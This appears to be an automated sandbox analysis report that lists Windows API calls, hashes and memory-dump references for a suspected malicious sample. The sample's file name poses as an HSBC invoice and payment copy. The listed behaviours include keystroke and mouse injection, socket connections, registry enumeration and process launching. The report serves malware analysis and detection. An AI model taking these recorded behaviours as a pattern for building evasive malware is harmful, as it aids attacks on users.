                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EE7480
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: 8f72cabd9d15e6a9d763a27230805fd8a75ca9417c872a2cab32cc1c9e55b123
                    • Instruction ID: 94f9bf6507f94a94ecfe879b00c76af07791c876b2f8915a9ee8a113e6cdd320
                    • Opcode Fuzzy Hash: 8f72cabd9d15e6a9d763a27230805fd8a75ca9417c872a2cab32cc1c9e55b123
                    • Instruction Fuzzy Hash: 7B316F35A04209EBCF10EF65DC85AAF7BB8FF49710F1441B5F904AB246DB70AA14DBA0
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 00F0645A
                    • GetDC.USER32(00000000), ref: 00F06462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F0646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 00F06479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F064B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F064C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F09299,?,?,000000FF,00000000,?,000000FF,?), ref: 00F06500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F06520
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 69a684c0df1fffd839283876f3debb63bcec771fbdd10ce0570317f153f7fedd
                    • Instruction ID: 97694251d8803bed6d64d40b41fc87b6eaa340661c1e85cf2480904e6ec8f006
                    • Opcode Fuzzy Hash: 69a684c0df1fffd839283876f3debb63bcec771fbdd10ce0570317f153f7fedd
                    • Instruction Fuzzy Hash: 3B318D72200214BFEB208F10CC4AFEA3FA9FF09765F044065FE08DA191C6759851EB60
                    APIs
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: be5e2f0141571e68db77ebdec3a7026ec37c7060fec27aab163dcb1d703768dc
                    • Instruction ID: 81b50d76c846a32c2cf5b91f6a027fe182bf2ef528d567b4096d38dd7bd19f40
                    • Opcode Fuzzy Hash: be5e2f0141571e68db77ebdec3a7026ec37c7060fec27aab163dcb1d703768dc
                    • Instruction Fuzzy Hash: 4F21F871601216B7D250A5609C42FEF37ACDF553E8F282012FE05F6382EB11ED22D2E6
                    APIs
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • CoInitialize.OLE32(00000000), ref: 00EED855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EED8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 00EED8FC
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EED9B7
                    • _memset.LIBCMT ref: 00EEDA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 00EEDA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EEDAAB
                    Similarity
                    • API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial__itow__swprintf_memset
                    • String ID:
                    • API String ID: 3008154123-0
                    • Opcode ID: bd74baacef09eaa7cbef3b661d856dff18397522fa4cbc4f7a86bce9195f770e
                    • Instruction ID: bb59482c625d256dbd6176b0892d904fa22a7b33c876e28e8c243272b83b2042
                    • Opcode Fuzzy Hash: bd74baacef09eaa7cbef3b661d856dff18397522fa4cbc4f7a86bce9195f770e
                    • Instruction Fuzzy Hash: 66B1E975A00109AFDB14DFA5CC88DAEBBF9FF48314B149469E909EB251DB30EE45CB50
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7550cf2730d167051d263980edf4d6277b73ee75d247864687206876d2f3953a
                    • Instruction ID: 33ce8d94d4751ac8bf51125fdd9593531322c87935ce3965f7278cce5c1281a1
                    • Opcode Fuzzy Hash: 7550cf2730d167051d263980edf4d6277b73ee75d247864687206876d2f3953a
                    • Instruction Fuzzy Hash: 56717E30900119EFCB14DF98CC49AFEBBB9FF85314F148199F919BA251C730AA52DBA0
                    APIs
                    • IsWindow.USER32(011B3B98), ref: 00F0B6A5
                    • IsWindowEnabled.USER32(011B3B98), ref: 00F0B6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F0B795
                    • SendMessageW.USER32(011B3B98,000000B0,?,?), ref: 00F0B7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 00F0B809
                    • GetWindowLongW.USER32(011B3B98,000000EC), ref: 00F0B82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F0B843
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: d75d325884746cdbb2ab5d103045357824a04e962dd540b3a6e910e8ed4d033b
                    • Instruction ID: e32a6c6c38577452bc7e223a773e0c84e8bf13a519aabd9ed1e55063ff362aa5
                    • Opcode Fuzzy Hash: d75d325884746cdbb2ab5d103045357824a04e962dd540b3a6e910e8ed4d033b
                    • Instruction Fuzzy Hash: 34719F34A00204AFDB30DF64C8A4FAA7BB9FF4A320F1440A9E955973E1C732A941FB51
                    APIs
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                    • CoInitialize.OLE32 ref: 00EF8718
                    • VariantInit.OLEAUT32(?), ref: 00EF8890
                    • VariantClear.OLEAUT32(?), ref: 00EF88F1
                    Strings
                    Similarity
                    • API ID: Variant$ClearInitInitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 4106155388-1287834457
                    • Opcode ID: 3d2a73d80caecd6ec04eb6799ebc2dd0a4dc342d8dc36736f2e524bd022dce4b
                    • Instruction ID: 18a478ec11c630515662bffe60ae04166ed01c36d1812186755fad2571f6542f
                    • Opcode Fuzzy Hash: 3d2a73d80caecd6ec04eb6799ebc2dd0a4dc342d8dc36736f2e524bd022dce4b
                    • Instruction Fuzzy Hash: DE61D3316083059FC714EF24CA44BABB7E4EF48754F54581EFA85AB291DB70ED48CB92
                    APIs
                    • _memset.LIBCMT ref: 00EFF75C
                    • _memset.LIBCMT ref: 00EFF825
                    • ShellExecuteExW.SHELL32(?), ref: 00EFF86A
                      • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                      • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                      • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 00EFF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 00EFF910
                    Strings
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: fe3b08a086c5202d74d1e51c1b74cf4533c2a21d5b40a6ecfd7c2dcd25b1629b
                    • Instruction ID: 9f2ac01190b3635b8ce4baf1eee8ae308b2f91bf6a5420d10442931cd724e406
                    • Opcode Fuzzy Hash: fe3b08a086c5202d74d1e51c1b74cf4533c2a21d5b40a6ecfd7c2dcd25b1629b
                    • Instruction Fuzzy Hash: 97618B75E006199FCF18EFA4C4819AEBBF5FF48314B149469E95ABB351CB30AD41CB90
                    APIs
                    • GetParent.USER32(?), ref: 00EE149C
                    • GetKeyboardState.USER32(?), ref: 00EE14B1
                    • SetKeyboardState.USER32(?), ref: 00EE1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00EE1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00EE155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00EE15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EE15C8
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: f537f0cdbb1da6bf395adc59f19c474fdf4f143f71ab0efd2728aa2a63a87d9b
                    • Instruction ID: c5f39be1baadc59dcc25796d1f0a2cf8bd561dd4c8cdfec94f1ff80ad4523612
                    • Opcode Fuzzy Hash: f537f0cdbb1da6bf395adc59f19c474fdf4f143f71ab0efd2728aa2a63a87d9b
                    • Instruction Fuzzy Hash: D951D2B06046DA3EFB3646268C45BBABEA96B46308F0C55C9E1D6658C2D3A49CC8D750
                    APIs
                    • GetParent.USER32(00000000), ref: 00EE12B5
                    • GetKeyboardState.USER32(?), ref: 00EE12CA
                    • SetKeyboardState.USER32(?), ref: 00EE132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EE1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EE1374
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EE13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EE13D9
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: a652f67fc09a1e9d9b2746eda419efb6bfc930785b0dac52598b692e32120611
                    • Instruction ID: 8d13c3107d430de1d2a61648f9ed36c5654dfc6c3a21ef07e8a47de4bf99fdb6
                    • Opcode Fuzzy Hash: a652f67fc09a1e9d9b2746eda419efb6bfc930785b0dac52598b692e32120611
                    • Instruction Fuzzy Hash: 3851E4B05046D93DFB3282268C45BBA7FA96B06308F0895C9E1D466CC2D3A5ACD8E751
                    APIs
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: f218631082d63529aad1a4743aff71c8d24dcce349a75ef2149d9f3deba71e6e
                    • Instruction ID: 34ab70ef647425f51b921aace18306a5bb4a6d5192dc59b04da59992e6993a41
                    • Opcode Fuzzy Hash: f218631082d63529aad1a4743aff71c8d24dcce349a75ef2149d9f3deba71e6e
                    • Instruction Fuzzy Hash: 4D41C4A6C2011876CB11EBB58C86ACFB7E89F0A310F50A866F518F7122E734E754C7A5
                    APIs
                      • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EE38D3,?), ref: 00EE48C7
                      • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EE38D3,?), ref: 00EE48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 00EE38F3
                    • _wcscmp.LIBCMT ref: 00EE390F
                    • MoveFileW.KERNEL32(?,?), ref: 00EE3927
                    • _wcscat.LIBCMT ref: 00EE396F
                    • SHFileOperationW.SHELL32(?), ref: 00EE39DB
                    Strings
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: 54452c6f528e8b405324b14fcb46c87cf7b69a4418ca91e7da824259c7b0bc01
                    • Instruction ID: a720bb4dcd62a706b5427ce149fecd8b697d631557dbe80e0ff3265442625142
                    • Opcode Fuzzy Hash: 54452c6f528e8b405324b14fcb46c87cf7b69a4418ca91e7da824259c7b0bc01
                    • Instruction Fuzzy Hash: A441B1B25083889EC751EF75C4859DFB7E8AF89340F10282EF489E3192EB75D688C752
                    APIs
                    • _memset.LIBCMT ref: 00F07519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F075C0
                    • IsMenu.USER32(?), ref: 00F075D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F07620
                    • DrawMenuBar.USER32 ref: 00F07633
                    Strings
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 7479bbdcdc340c5009d04d07236418417133978726db14a255a6dec689605cde
                    • Instruction ID: 77e1d664c5cef2e8ed62cd326f3c32f2f8cc80902f5fdcb70325fc4faf54d0f5
                    • Opcode Fuzzy Hash: 7479bbdcdc340c5009d04d07236418417133978726db14a255a6dec689605cde
                    • Instruction Fuzzy Hash: 12412875E04708AFDB20EF54D984AAABBF8FB09324F048069E91697290D731AD54EF90
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F0125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F01286
                    • FreeLibrary.KERNEL32(00000000), ref: 00F0133D
                      • Part of subcall function 00F0122D: RegCloseKey.ADVAPI32(?), ref: 00F012A3
                      • Part of subcall function 00F0122D: FreeLibrary.KERNEL32(?), ref: 00F012F5
                      • Part of subcall function 00F0122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F01318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F012E0
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: 9c9511c08bfb50452a37c4ca9fcdbe6f458cf00bf784d95e2b684fe19062d43c
                    • Instruction ID: 45aa357b83a715d6d32cd9c322dc28e749abb1d90b2cdcd538e55fcfe9beff40
                    • Opcode Fuzzy Hash: 9c9511c08bfb50452a37c4ca9fcdbe6f458cf00bf784d95e2b684fe19062d43c
                    • Instruction Fuzzy Hash: 84310BB1D0111DBFEB159B90DC89AFFB7BCFF09310F000169E501E2591EA749E89BAA0
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F0655B
                    • GetWindowLongW.USER32(011B3B98,000000F0), ref: 00F0658E
                    • GetWindowLongW.USER32(011B3B98,000000F0), ref: 00F065C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F065F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F0661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F06630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F0664A
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: eb8586da359080f003827d472e1582b681e67dcd8a394e6cf51391daa4eac4b8
                    • Instruction ID: 291ee436dfbb1d92ffbd39a1f82f5b0090b278853eeef6574321c86a7ad94a66
                    • Opcode Fuzzy Hash: eb8586da359080f003827d472e1582b681e67dcd8a394e6cf51391daa4eac4b8
                    • Instruction Fuzzy Hash: 7231F235A04258AFDB208F18DC85F653BE1FB5A724F1901A8F911CB2F5CB62A864FB51
                    APIs
                      • Part of subcall function 00EF80A0: inet_addr.WS2_32(00000000), ref: 00EF80CB
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00EF64D9
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF64E8
                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00EF6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 00EF652A
                    • WSAGetLastError.WS2_32 ref: 00EF6534
                    • closesocket.WS2_32(00000000), ref: 00EF655D
                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00EF6576
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: 92f671e990a11902ccd557290bd9a5e581d0ed70e1ed17f91ddc1e762c313365
                    • Instruction ID: 27f54d17a1f65878590c8c7fcd2d7f763567ea4958696c7a0fd94471e4c1741f
                    • Opcode Fuzzy Hash: 92f671e990a11902ccd557290bd9a5e581d0ed70e1ed17f91ddc1e762c313365
                    • Instruction Fuzzy Hash: CC31937160011CAFDB10AF64DC85BBE7BE9FB44714F049069FA09B7291DB74AD08DBA1
                    APIs
                      • Part of subcall function 00E81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E81D73
                      • Part of subcall function 00E81D35: GetStockObject.GDI32(00000011), ref: 00E81D87
                      • Part of subcall function 00E81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E81D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F078A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F078AE
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F078B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F078C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F078D4
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: d7e04d207f1ee576a6062b2ab64d7a9fdb19c2fadf6cc073abbf1ed20007e860
                    • Instruction ID: 0c7da50bf85f63c77fde4e4a4467e01f28b119a6740b8cfc600e7390284b6dd8
                    • Opcode Fuzzy Hash: d7e04d207f1ee576a6062b2ab64d7a9fdb19c2fadf6cc073abbf1ed20007e860
                    • Instruction Fuzzy Hash: FE1163B2550219BFEF159F60CC85EE77F5DEF08768F118115FA04A60A0D772AC21EBA4
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00EA41E3
                    • GetProcAddress.KERNEL32(00000000), ref: 00EA41EA
                    • RtlEncodePointer.NTDLL(00000000), ref: 00EA41F6
                    • RtlDecodePointer.NTDLL(00000001), ref: 00EA4213
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoInitialize$combase.dll
                    • API String ID: 3489934621-340411864
                    • Opcode ID: e2ce78c40b03a326d76e98cba0d2193152c9e687b9714555fc88a720aa248ed3
                    • Instruction ID: bba69699bc667a5beaffbe1491385c7096b9eb544f6d55a64cae73c52b0984ef
                    • Opcode Fuzzy Hash: e2ce78c40b03a326d76e98cba0d2193152c9e687b9714555fc88a720aa248ed3
                    • Instruction Fuzzy Hash: 22E01AF8690348AFEB315BB0EC09B443AA4B7B6706F109424B811F94E0DBB574D9BF00
                    APIs
                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EA41B8), ref: 00EA42B8
                    • GetProcAddress.KERNEL32(00000000), ref: 00EA42BF
                    • RtlEncodePointer.NTDLL(00000000), ref: 00EA42CA
                    • RtlDecodePointer.NTDLL(00EA41B8), ref: 00EA42E5
                    Similarity
                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                    • String ID: RoUninitialize$combase.dll
                    • API String ID: 3489934621-2819208100
                    • Opcode ID: e724bc5ab711bf90574b6a5226a94180c64aee0cbb6637e2f4b961c22c643b68
                    • Instruction ID: 4947b0c10c0776ee9adc3579ef490211c86a841519d90547d0e32c9c87327d87
                    • Opcode Fuzzy Hash: e724bc5ab711bf90574b6a5226a94180c64aee0cbb6637e2f4b961c22c643b68
                    • Instruction Fuzzy Hash: 5AE0BF7C5413089BEB619B60FD0EB443AA4B766746F205025F401F54B0CBB4A594FA15
                    APIs
                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 00EF6F14
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF6F48
                    • htons.WS2_32(?), ref: 00EF6FFE
                    • inet_ntoa.WS2_32(?), ref: 00EF6FBB
                      • Part of subcall function 00EDAE14: _strlen.LIBCMT ref: 00EDAE1E
                      • Part of subcall function 00EDAE14: _memmove.LIBCMT ref: 00EDAE40
                    • _strlen.LIBCMT ref: 00EF7058
                    • _memmove.LIBCMT ref: 00EF70C1
                    Similarity
                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                    • String ID:
                    • API String ID: 3619996494-0
                    • Opcode ID: 4f55a4b06496d36b1b55ad8736d0dace6e4f7827f89d58ac490be4b8b5ff3b76
                    • Instruction ID: 9cf74cd404a7e4dbdb43935c140826b50ba2cd1dadcfe2589b82950b55e50a6b
                    • Opcode Fuzzy Hash: 4f55a4b06496d36b1b55ad8736d0dace6e4f7827f89d58ac490be4b8b5ff3b76
                    • Instruction Fuzzy Hash: 8C81CF32508304ABD710EB24CC81E7BB7E9AF84718F146919F659AB292DA71AD05C792
                    APIs
                    Similarity
                    • API ID: _memmove$__itow__swprintf
                    • String ID:
                    • API String ID: 3253778849-0
                    • Opcode ID: fbb2d1d40f4c81195ce3c36d950c9e76a75fce58676de37b554099b96ca2b291
                    • Instruction ID: 87e657c5aa5973d677dd2c440333dacdea5116dc508d0615ca761f6d14889ad8
                    • Opcode Fuzzy Hash: fbb2d1d40f4c81195ce3c36d950c9e76a75fce58676de37b554099b96ca2b291
                    • Instruction Fuzzy Hash: 2561893050029A9BCF15EF61CC82EFE77A4AF99348F086559F8597B292DB31AD41CB50
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00F010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F00548
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F00588
                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F005AB
                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F005D4
                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F00617
                    • RegCloseKey.ADVAPI32(00000000), ref: 00F00624
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                    • String ID:
                    • API String ID: 4046560759-0
                    • Opcode ID: a98daeb23c7bb34f3b4cfb66ebfdb6cf38e39ea4014ac5e66c23727bf5a9163b
                    • Instruction ID: 4e4575c1a4c91ccafac4abf7ed34b3671295b8d60ca3d65160965319af14a328
                    • Opcode Fuzzy Hash: a98daeb23c7bb34f3b4cfb66ebfdb6cf38e39ea4014ac5e66c23727bf5a9163b
                    • Instruction Fuzzy Hash: ED515931608200AFCB14EB24CC85E6FBBE9FF88714F04491DF599972A1DB31E905EB52
                    APIs
                    • GetMenu.USER32(?), ref: 00F05A82
                    • GetMenuItemCount.USER32(00000000), ref: 00F05AB9
                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F05AE1
                    • GetMenuItemID.USER32(?,?), ref: 00F05B50
                    • GetSubMenu.USER32(?,?), ref: 00F05B5E
                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F05BAF
                    Similarity
                    • API ID: Menu$Item$CountMessagePostString
                    • String ID:
                    • API String ID: 650687236-0
                    • Opcode ID: 6c0564c9c8099a21c4efe36830c10bb8f9ab71158cfd8594c39ec23ef236bc65
                    • Instruction ID: 3448ffd3b02c811703c69f70dc0c381960bfe864bc38e10ef1f9400e3c53bc15
                    • Opcode Fuzzy Hash: 6c0564c9c8099a21c4efe36830c10bb8f9ab71158cfd8594c39ec23ef236bc65
                    • Instruction Fuzzy Hash: 00519F75E00619AFCB10EFA4C845AAEB7F4EF48720F104099E805BB291CB74BE41EF90
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00EDF3F7
                    • VariantClear.OLEAUT32(00000013), ref: 00EDF469
                    • VariantClear.OLEAUT32(00000000), ref: 00EDF4C4
                    • _memmove.LIBCMT ref: 00EDF4EE
                    • VariantClear.OLEAUT32(?), ref: 00EDF53B
                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EDF569
                    Similarity
                    • API ID: Variant$Clear$ChangeInitType_memmove
                    • String ID:
                    • API String ID: 1101466143-0
                    • Opcode ID: f12e6ed4d8c2af45c5e4f4605a830d452027f307be476667d410f3ad8fe75b7b
                    • Instruction ID: 28bfb69ad9e11a9637667f02720f499b7ca627903187af94a19d9ffe8350ab3b
                    • Opcode Fuzzy Hash: f12e6ed4d8c2af45c5e4f4605a830d452027f307be476667d410f3ad8fe75b7b
                    • Instruction Fuzzy Hash: C9513CB5A00209DFCB14CF58D884AAAB7F8FF4C354B15856AED59EB311D730E952CBA0
                    APIs
                    • _memset.LIBCMT ref: 00EE2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE2792
                    • IsMenu.USER32(00000000), ref: 00EE27B2
                    • CreatePopupMenu.USER32 ref: 00EE27E6
                    • GetMenuItemCount.USER32(000000FF), ref: 00EE2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EE2875
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 05ae6f60e648d02e14a00773e80a05e9309abb484d20bb37dc5a852fb94f5f16
                    • Instruction ID: b883a90320c4cec647f90d46e7f6cee47eb03b541d99d5b1daf760580d1df3fe
                    • Opcode Fuzzy Hash: 05ae6f60e648d02e14a00773e80a05e9309abb484d20bb37dc5a852fb94f5f16
                    • Instruction Fuzzy Hash: 4F51B070A0038DDBDF28CF6AD888AAEBBF8BF44318F14516DE615AB291D7708904CB55
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E8179A
                    • GetWindowRect.USER32(?,?), ref: 00E817FE
                    • ScreenToClient.USER32(?,?), ref: 00E8181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E8182C
                    • EndPaint.USER32(?,?), ref: 00E81876
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: b416a711d42bdad425aa3a76bb02b3cf54bd4af87b8e7ea0974e4c9f75c8b849
                    • Instruction ID: d2d8fc351051a9e9e1dec9df4e0e1e3acb27f1604a615ccb1a8d57a09baaf674
                    • Opcode Fuzzy Hash: b416a711d42bdad425aa3a76bb02b3cf54bd4af87b8e7ea0974e4c9f75c8b849
                    • Instruction Fuzzy Hash: FC41A0705043049FD720EF24CC85FBA7BE8FB5A724F040669F9A8D62A1C7719846EB62
                    APIs
                    • ShowWindow.USER32(00F467B0,00000000,011B3B98,?,?,00F467B0,?,00F0B862,?,?), ref: 00F0B9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 00F0B9F0
                    • ShowWindow.USER32(00F467B0,00000000,011B3B98,?,?,00F467B0,?,00F0B862,?,?), ref: 00F0BA50
                    • ShowWindow.USER32(00000000,00000004,?,00F0B862,?,?), ref: 00F0BA62
                    • EnableWindow.USER32(00000000,00000001), ref: 00F0BA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F0BAA9
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: de8a297c1c43cce4a619741de79239f3563b0a2c135b7456a47b9386f3c1767a
                    • Instruction ID: a48c9717739f903213af3cb344213e9c6c6d99bfcce7cfd2e66dcd07a943d143
                    • Opcode Fuzzy Hash: de8a297c1c43cce4a619741de79239f3563b0a2c135b7456a47b9386f3c1767a
                    • Instruction Fuzzy Hash: D8413034A00245AFDB26CF18C489B957BE1FB05725F1842B9EE488F6E2C735A845FB61
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00EF5134,?,?,00000000,00000001), ref: 00EF73BF
                      • Part of subcall function 00EF3C94: GetWindowRect.USER32(?,?), ref: 00EF3CA7
                    • GetDesktopWindow.USER32 ref: 00EF73E9
                    • GetWindowRect.USER32(00000000), ref: 00EF73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EF7422
                      • Part of subcall function 00EE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                    • GetCursorPos.USER32(?), ref: 00EF744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EF74AC
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: feaab00622d93821d7f90b04b3582377a2de19918f84da50c391d9ffb8d37539
                    • Instruction ID: 7bdf8a8a7f9ffadc09420374fd5805fe466b177c74b491e96b1fe667e0e010f1
                    • Opcode Fuzzy Hash: feaab00622d93821d7f90b04b3582377a2de19918f84da50c391d9ffb8d37539
                    • Instruction Fuzzy Hash: 5131E872508309ABD720DF54DC49F6BBBDAFF88314F001919F995A7191CB30E909CB92
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EDE0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EDE120
